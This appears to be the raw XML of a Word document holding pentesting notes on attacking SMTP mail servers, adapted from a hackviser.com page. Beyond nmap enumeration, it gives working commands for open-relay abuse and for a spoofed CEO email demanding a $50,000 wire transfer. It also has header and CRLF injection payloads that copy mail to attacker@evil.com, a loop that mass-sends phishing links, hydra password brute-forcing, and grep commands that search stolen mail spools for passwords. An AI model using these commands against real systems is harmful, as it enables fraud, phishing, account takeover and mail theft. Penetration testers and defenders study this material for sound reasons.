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e3o4qg91au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https://hackviser.com/tactics/pentesting/services/smtp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  <w:t xml:space="preserve">Default Ports: 25 (SMTP), 465 (SMTPS), 587 (Submission)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">nmap -sV -p 25,465,587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target.com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mail server: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https://github.com/mailhog/MailHog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sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_yfj33fdkf4dd" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Enum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Enumerate supported SMTP commands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nmap -p 25 --script smtp-commands target.com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Test for user enumeration via VRFY/EXPN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nmap -p 25 --script smtp-enum-users target.com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Extract NTLM authentication details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nmap -p 25 --script smtp-ntlm-info target.com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Run all SMTP-related scripts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nmap -p 25,465,587 --script smtp-*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target.com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Send test email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swaks --to victim@target.com --from sender@attacker.com --server target.com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With authentication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swaks --to victim@target.com --from user@target.com \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--auth-user user@target.com --auth-password password \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--server target.com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With attachment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swaks --to victim@target.com --from sender@attacker.com \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--attach /path/to/file.pdf \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--server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target.com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53ktypd1hhfn" w:id="2"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Attack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 relay testing - Test SMTP servers for open relay vulnerabilities that allow unauthorized email forwarding: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Test 2: Using nmap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nmap -p 25 --script smtp-open-relay target.com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Test 3: Using swaks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swaks --to external@domain.com --from external@otherdomain.com --server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target.com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Email Spoofing - Send emails with spoofed sender addresses to bypass authentication and appear legitimate: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Spoof email from CEO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telnet target.com 25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EHLO attacker.com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MAIL FROM:&lt;ceo@target.com&gt;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RCPT TO:&lt;employee@target.com&gt;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From: CEO &lt;ceo@target.com&gt;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To: employee@target.com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Subject: Urgent: Wire Transfer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Please transfer $50,000 to account XYZ immediately.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QUIT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Using sendemail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sendemail -f ceo@target.com -t employee@target.com \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-u "Urgent: Wire Transfer" \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-m "Please transfer funds..." \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target.com:25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SMTP Injection - Inject malicious content into SMTP communications to bypass security controls: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Inject additional headers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In forms that send email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Email: victim@target.com%0ACc:attacker@evil.com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Email: victim@target.com%0ABcc:attacker@evil.com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Email: victim@target.com%0AFrom:admin@target.com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Inject mail body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Message: Test%0A.%0AMAIL FROM:&lt;attacker@evil.com&gt;%0ARCPT TO:&lt;victim2@target.com&gt;%0ADATA%0APhishing email%0A.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CRLF injection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Subject: Test%0D%0ACc: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attacker@evil.com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Phishing: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Create phishing email list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cat &gt; targets.txt &lt;&lt;EOF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victim1@target.com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victim2@target.com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victim3@target.com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Send phishing emails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while read email; do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swaks --to $email \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--from support@target.com \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--server target.com \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--header "Subject: Password Reset Required" \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--body "Click here: http://evil.com/phishing"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done &lt; targets.txt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Hydra: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Using hydra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hydra -l user@target.com -P passwords.txt smtp://target.com:587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With username list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hydra -L users.txt -P passwords.txt smtp://target.com:587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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_iwoc5w4l5xaq" w:id="3"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Post Exploitation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If you have access to mail server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Read mail spool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/var/mail/username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/var/spool/mail/username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Maildir format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ls -la /home/username/Maildir/cur/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/home/username/Maildir/cur/*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Extract email addresses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grep -Eiorh '\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Z|a-z]{2,}\b' /var/mail/*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Search for sensitive keywords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grep -r -i "password\|secret\|confidential" /var/mail/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Extract attachments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/var/mail/ -name "*.pdf" -o -name "*.doc" -o -name "*.xls"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>
          <w:b w:val="1"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_m5cy9i7j6h7n" w:id="4"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Swaks</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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Connect to email server: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swaks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–f user@domain –t user@domain –d email.eml -s 10.0.0.0:25  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Send email with attachments</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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swaks –ehlo user@domain –from name@domain –to user@domain –server smpt.server.local --h-From ‘”Name” &lt;name@domain&gt;’ --attach-type text/html --attach-body @Mail-template.html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arget.com" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://target.com" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:attacker@evil.com" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://target.com:2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arge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hackviser.com/tactics/pentesting/services/smtp" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://target.com" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mailhog/MailH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